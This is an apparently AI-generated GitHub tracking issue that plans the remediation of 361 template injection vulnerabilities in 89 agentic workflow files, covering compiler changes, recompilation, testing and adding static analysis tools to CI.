[plan] Fix Template Injection Vulnerabilities Identified in Static Analysis (2025-11-29) #5076
Description
Overview
This tracking issue addresses the critical template injection vulnerabilities identified in the static analysis report from 2025-11-29.
Source: Discussion #5071
Problem Summary
The static analysis scan identified 361 template injection vulnerabilities affecting all 89 agentic workflow files. These vulnerabilities occur where GitHub Actions template expressions expand user-controlled data in potentially unsafe contexts.
Risk: Template injection could allow:
- Command injection through malicious input
- Environment variable manipulation
- Potential secrets exfiltration
Planned Tasks
This work is broken down into 5 focused sub-issues:
- Update workflow compiler - Modify the gh-aw compiler to generate secure code patterns using environment variables instead of direct template expansion
- Create automated recompilation script - Build tooling to systematically recompile all 89 workflows
- Test security fix on sample workflows - Validate the fix works correctly before mass deployment
- Deploy fixes to all workflows - Recompile all 89 workflows with the updated compiler
- Add static analysis to CI/CD - Integrate zizmor, actionlint, and poutine into the development pipeline to prevent regressions
Acceptance Criteria
- All 89 workflows pass zizmor scan with no High severity template injection findings
- Workflows maintain existing functionality after recompilation
- Static analysis tools integrated into CI/CD pipeline
- Documentation updated with secure coding patterns
Reference
- Static Analysis Report: Discussion Static Analysis Report - 2025-11-29 #5071
- Zizmor Template Injection Documentation: (redacted)
AI generated by Plan Command for discussion #5071